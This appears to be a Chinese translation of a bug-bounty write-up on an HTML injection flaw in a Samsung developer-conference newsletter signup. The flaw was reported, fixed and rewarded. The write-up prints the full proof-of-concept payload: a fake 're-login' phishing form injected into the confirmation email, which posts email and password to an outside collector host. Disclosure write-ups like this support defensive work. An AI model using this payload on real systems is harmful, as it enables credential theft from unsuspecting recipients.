漏洞发现

在对三星网站进行渗透测试时，首先使用了不同的 Google Dorks 进行信息搜集。发现了一处子域名：

https://www.samsungdeveloperconference.com/

在该网站的新闻订阅页面中，用户需要输入名字、姓氏和邮箱地址以订阅新闻。

为了测试 HTML 注入漏洞，在名字和姓氏字段中加入了恶意的 Payload，并成功触发了该漏洞。

在提交订阅后，可以看到输入的 Payload 被成功注入，并通过电子邮件发送给用户，完整的PoC如下：

Dear TeamAs part of our commitment to security, we have logged you out of your accounts due to recent updates in our system protocols. To ensure the safety and integrity of your account, please re-login using the secure link provided below.<html><body><form action="https://burpcolloborator.com">Login again for security:<br><br> <label for="u">Email id:<input type="text" id="u" name="u"><br><br><label for="p">Password:<input type="password" id="p" name="p"><br></br><input type="submit" value="Submit"></body></html>Payload in lastname:If you encounter any issues or have questions, feel free to reach out to our IT support team at. We appreciate your cooperation in keeping our systems secure.Thank you for your understanding.Best Regards,Samsung Developer<!--

被插入恶意 Payload 的电子邮件展示如下：

在发现漏洞后，我立即向三星团队报告。三星的响应速度非常快，并对我的报告进行了确认和奖励。然而，尽管漏洞利用的严重性显而易见，三星团队却将其标记为低严重性（LOW），而我认为至少应该为中等严重性（P3）。

三星的修复措施

三星团队随后采取了以下措施来修复该漏洞：对输入字符进行了详细的白名单审核，包括'>'、'<', ',"、'%' 等字符。

时间线

2024-11-13：报告漏洞2024-11-26：确认漏洞有效2024-12-13：确认修复已部署，并询问更新2024-12-18：确认修复已部署，标记为低严重性2025-01-06：确认并决定奖励2025-01-11：建议重新评估严重性为 P32025-01-16：拒绝了重新评估请求2025-02-17：通过 BUGCROWD 获得赏金奖励

以上内容由骨哥翻译并整理。

原文：https://infosecwriteups.com/htmli-to-ato-leads-to-bounty-9725cb23a67c